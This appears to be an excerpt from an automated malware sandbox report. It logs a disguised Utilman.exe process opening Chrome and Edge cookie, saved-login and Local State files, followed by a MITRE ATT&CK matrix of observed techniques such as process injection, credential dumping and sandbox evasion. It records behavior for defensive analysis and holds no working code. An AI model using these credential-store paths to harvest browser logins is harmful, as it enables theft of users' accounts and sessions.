Source: C:\Windows\SysWOW64\Utilman.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\Utilman.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	412 Process Injection	1 Masquerading	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	412 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	113 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Timestomp	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 DLL Side-Loading	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement